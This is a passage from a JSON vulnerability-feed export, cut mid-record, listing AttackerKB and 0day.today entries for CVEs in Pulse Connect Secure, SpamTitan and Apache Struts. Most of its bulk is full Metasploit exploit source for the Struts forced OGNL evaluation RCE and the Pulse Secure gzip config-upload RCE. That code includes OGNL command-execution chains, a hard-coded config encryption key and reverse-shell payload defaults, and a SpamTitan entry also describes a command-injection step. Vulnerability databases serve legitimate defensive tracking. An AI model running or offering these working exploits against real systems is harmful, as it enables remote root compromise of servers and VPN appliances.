["CVE-2020-11738"], "modified": "2020-06-05T00:00:00", "id": "AKB:7B975634-2048-4113-92B7-D2E74D1CEE74", "href": "https://attackerkb.com/topics/judia21wRt/cve-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T15:07:02", "description": "A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T00:00:00", "type": "attackerkb", "title": "CVE-2020-8260", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2020-10-31T00:00:00", "id": "AKB:EE68C1DD-4843-420D-B126-5C0A7277EFD4", "href": "https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:14", "description": "An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at November 03, 2020 6:26pm UTC reported:\n\nSpamTitan Gateway is an anti-spam appliance that protects against unwanted emails and malwares. Versions 7.01, 7.02, 7.03 and 7.07 are vulnerable to Remote Code Execution as `root` due to improper input sanitization. 
Note that only version 7.03 needs authentication; no authentication is required for versions 7.01, 7.02 and 7.07.\n\nThe attack consists of abusing the SpamTitan Gateway UI `SNMP Management Settings` feature to inject dangerous `SNMPD` command directives into the SNMP server configuration file. This can be done in two steps:\n\n 1. Send an HTTP POST request to the `snmp-x.php` page with a specially crafted `community` parameter: \n`...[SNIP]...&community=<community>\" <ip>\\nextend <random name> <payload>`. \nThis will end up being added to `snmp.conf` like this: \n`\u2026[SNIP]...` \n`rocommunity \"<community>\" <ip>` \n`extend <random name> <payload>` \n`\u2026[SNIP]...` \n\n 2. Send an SNMP `Get-Request` to the correct OID to trigger the payload. \n\n\nSince a [proof of concept](<https://www.exploit-db.com/exploits/48856>) and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14330>) are available, it is highly recommended to upgrade to the latest available version.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-11698", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11698"], "modified": "2020-09-25T00:00:00", "id": "AKB:EADBBBBE-8A57-469F-A96F-22A14761BCF0", "href": "https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-06T05:26:06", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{\u2026} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-31805", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-12T00:00:00", "id": "AKB:CB02764B-566F-4540-ACA2-C9DDEE8D1496", "href": "https://attackerkb.com/topics/v2k6fAErDS/cve-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. 
No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-08-09T12:46:53", "description": "The Apache Struts framework, when forced OGNL evaluation is applied to certain tag attributes such as id, performs double evaluation of the attribute values. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to remote code execution. This vulnerability is application dependent. 
A server-side template must use request data in an affected way to render an HTML tag attribute.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-24T00:00:00", "type": "zdt", "title": "Apache Struts 2 Forced Multi OGNL Evaluation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "1337DAY-ID-35571", "href": "https://0day.today/exploit/description/35571", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',\n 'Description' => %q{\n The Apache Struts framework, when forced OGNL evaluation is applied to certain tag attributes such as id, performs\n double evaluation of the attribute values. 
It is therefore possible to pass in a value to Struts that will be\n evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote\n Code Execution (RCE).\n\n This vulnerability is application dependent. A server-side template must use request data in an affected way to\n render an HTML tag attribute.\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Matthias Kaiser', # discovery of CVE-2019-0230\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530\n 'ka1n4t', # PoC of CVE-2020-17530\n ],\n 'References' => [\n ['CVE', '2019-0230'],\n ['CVE', '2020-17530'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],\n ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', 
['CVE-2020-17530', 'CVE-2019-0230']])\n ])\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])\n ])\n end\n\n def check\n num1 = rand(1000..9999)\n num2 = rand(1000..9999)\n\n res = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\"))\n if res.nil?\n return CheckCode::Unknown\n elsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty?\n return CheckCode::Safe\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n cve = datastore['CVE']\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\")\n\n if cve == 'CVE-2019-0230'\n ognl = []\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']'\n ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'\n ognl << '#ognlUtil.setExcludedClasses(\\'\\')'\n ognl << '#ognlUtil.setExcludedPackageNames(\\'\\')'\n res = send_request_cgi(build_http_request(cve, ognl))\n fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200\n end\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded, { cve: cve })\n when :linux_dropper\n execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })\n end\n end\n\n def execute_command(cmd, opts = {})\n send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)\n end\n\n def build_http_request(cve, ognl)\n ognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? 
Array\n\n http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }\n http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?\n if cve == 'CVE-2019-0230'\n http_request_parameters['method'] = 'GET'\n http_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n elsif cve == 'CVE-2020-17530'\n http_request_parameters['method'] = 'POST'\n http_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n end\n http_request_parameters\n end\n\n def build_ognl(cve, cmd)\n cmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ognl = []\n if cve == 'CVE-2019-0230'\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'\n ognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\"\n elsif cve == 'CVE-2020-17530'\n ognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]'\n ognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]'\n ognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")'\n ognl << '#bean.setBean(#stack)'\n ognl << '#context=#bean.get(\"context\")'\n ognl << '#bean.setBean(#context)'\n ognl << '#macc=#bean.get(\"memberAccess\")'\n ognl << '#bean.setBean(#macc)'\n ognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")'\n ognl << '#bean.put(\"excludedClasses\",#emptyset)'\n ognl << '#bean.put(\"excludedPackageNames\",#emptyset)'\n ognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")'\n ognl << \"#execute.exec({\\\"#{cmd}\\\"})\"\n end\n\n ognl\n end\nend\n", "sourceHref": "https://0day.today/exploit/35571", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T16:39:24", "description": "The Pulse Connect Secure appliance versions prior to 9.1R9 suffer from an uncontrolled gzip extraction vulnerability which 
allows an attacker to overwrite arbitrary files, resulting in remote code execution as root. Admin credentials are required for successful exploitation.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-18T00:00:00", "type": "zdt", "title": "Pulse Secure VPN Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2020-12-18T00:00:00", "id": "1337DAY-ID-35525", "href": "https://0day.today/exploit/description/35525", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n ENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pulse Secure VPN gzip RCE',\n 'Description' => %q{\n The Pulse Connect Secure appliance before 9.1R9 
suffers from an uncontrolled gzip extraction vulnerability\n which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root.\n Admin credentials are required for successful exploitation.\n Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\n },\n 'Author' => [\n 'h00die', # msf module\n 'Spencer McIntyre', # msf module\n 'Richard Warren <[email\u00a0protected]>', # original PoC, discovery\n 'David Cash <[email\u00a0protected]>', # original PoC, discovery\n ],\n 'References' => [\n ['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'],\n ['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'],\n ['CVE', '2020-8260']\n ],\n 'DisclosureDate' => '2020-10-26',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix In-Memory',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }\n }\n ]\n ],\n 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } },\n 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' },\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],\n 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure']\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the application', '/']),\n OptString.new('USERNAME', [true, 'The username to 
login with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to login with', '123456'])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]),\n ])\n end\n\n def check(exploiting: false)\n login\n res = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') })\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200\n version = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version\n version, build = version\n\n return CheckCode::Unknown unless version.include?('R')\n\n version, revision = version.split('R', 2)\n print_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\")\n return CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9\n\n CheckCode::Detected\n rescue Msf::Exploit::Failed\n CheckCode::Unknown\n ensure\n logout unless exploiting\n end\n\n def exploit\n case (checkcode = check(exploiting: true))\n when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears\n print_good(checkcode.message)\n when Exploit::CheckCode::Detected\n print_warning(checkcode.message)\n else\n fail_with(Module::Failure::Unknown, checkcode.message.to_s)\n end\n\n case target['Type']\n when :unix_memory\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(\n linemax: 262144, # 256KiB\n delay: datastore['CMDSTAGER::DELAY']\n )\n end\n\n logout\n end\n\n def execute_command(command, _opts = {})\n trigger = Rex::Text.rand_text_alpha_upper(8)\n print_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\")\n\n config = build_malicious_config(command, trigger)\n res = upload_config(config)\n\n fail_with(Failure::UnexpectedReply, 'File upload 
failed') unless res&.code == 200\n\n print_status('Triggering RCE')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'),\n 'headers' => { trigger => trigger }\n })\n end\n\n def res_get_xsauth(res)\n res.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first\n end\n\n def upload_config(config)\n print_status('Requesting backup config page')\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'),\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'vars_get' => { 'type' => 'system' }\n })\n fail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil?\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"')\n post_data.add_part('Import', nil, nil, 'form-data; name=\"op\"')\n post_data.add_part('system', nil, nil, 'form-data; name=\"type\"')\n post_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"')\n post_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"')\n post_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"')\n post_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"')\n\n print_status('Uploading encrypted config backup')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'),\n 'method' => 'POST',\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'data' => post_data.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\n })\n end\n\n def login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 
'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'tz_offset' => '-300',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'realm' => 'Admin Users',\n 'btnSubmit' => 'Sign In'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302\n location = res.headers['Location']\n fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed')\n\n return unless location.include?('admin%2Dconfirm')\n\n # if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it.\n print_status('Other admin sessions detected, continuing')\n res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'btnContinue' => 'Continue the session',\n 'FormDataStr' => fds.first,\n 'xsauth' => xsauth\n },\n 'keep_cookies' => true\n })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res\n end\n\n def logout\n print_status('Logging out to prevent warnings to other admins')\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200\n\n logout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first\n fail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil?\n\n res = send_request_cgi({ 'uri' => logout_uri })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302\n end\n\n def 
build_malicious_config(cmd, trigger)\n payload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\"\n perl = <<~PERL\n if (length $ENV{HTTP_#{trigger}}){\n chmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\";\n system(\"env /data/var/runtime/tmp/tt/#{payload_script}\");\n }\n PERL\n tarfile = StringIO.new\n Gem::Package::TarWriter.new(tarfile) do |tar|\n tar.mkdir('tmp', 509)\n tar.mkdir('tmp/tt', 509)\n tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|\n tio.write perl\n end\n tar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio|\n tio.write \"PATH=/home/bin:$PATH\\n\"\n tio.write \"rm -- \\\"$0\\\"\\n\"\n tio.write cmd\n end\n end\n\n gzfile = StringIO.new\n gz = Zlib::GzipWriter.new(gzfile)\n gz.write(tarfile.string)\n gz.close\n\n encrypt_config(gzfile.string)\n end\n\n def encrypt_config(config_blob)\n cipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt\n iv = cipher.iv = cipher.random_iv\n cipher.key = ENCRYPTION_KEY\n\n md5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\")\n\n ciphertext = cipher.update(config_blob)\n ciphertext << cipher.final\n md5 << ciphertext\n\n cipher.reset\n \"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\"\n end\nend\n", "sourceHref": "https://0day.today/exploit/35525", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:49:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-18T00:00:00", "type": 